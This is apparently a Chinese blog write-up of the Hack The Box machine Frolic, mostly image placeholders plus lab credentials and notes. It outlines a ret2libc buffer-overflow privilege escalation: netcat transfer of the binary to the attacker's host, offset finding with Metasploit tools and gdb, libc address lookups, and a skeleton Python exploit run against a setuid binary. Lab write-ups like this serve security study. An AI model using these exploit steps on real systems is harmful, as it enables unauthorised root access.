Hack the box靶机 Frolic

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述

admin:superduperlooperpassword_lol

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

admin:imnothuman
上面那一堆?!是Ook!语言

在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述

漏洞可以利用

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

52字节

在这里插入图片描述在这里插入图片描述

整理一下缓冲区溢出利用过程
kali nc -lp 1234 > rop
靶机  nc 10.10.16.118 1234 < rop

收到rop后
kali机器需要的文件
/usr/share/metasploit-framework/tools/exploit/
文件夹下两个文件
1.pattern_create.rb   #生成字符串
2.pattern_offset.rb   #定位字符串

kali机器操作
1../pattern_create.rb -l 150
2.chmod +x rop
3.gdb ./rop
4.alsr
5.pdisass main
6.checksec
7.r '生成的字符串'
8../pattern_offset.rb -q 最后一行字符串
得到了字节个数

靶机操作
1.ldd /home/ayush/.binary/rop |grep libc		 			   #得到字符串1
2.readelf -s /lib/i386-linux-gnu/libc.so.6 | grep ”system@“	   #得到字符串2
3.readelf -s /lib/i386-linux-gnu/libc.so.6 | grep “exit@”  	   #得到字符串3
4.strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"   #得到字符串4


利用脚本
#!/usr/bin/python

import struct

buf = "A" * 字符串定位数值
system =  addr(字符串1 + 字符串2)
exit =  addr(字符串1 + 字符串3)
shell =  addr(字符串1 +  字符串4)
print buf + system + exit + shell

wget上传脚本到/tmp
chmod +x exploit.py
/home/ayush/.binary/rop $(python /tmp/exploit.py)
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值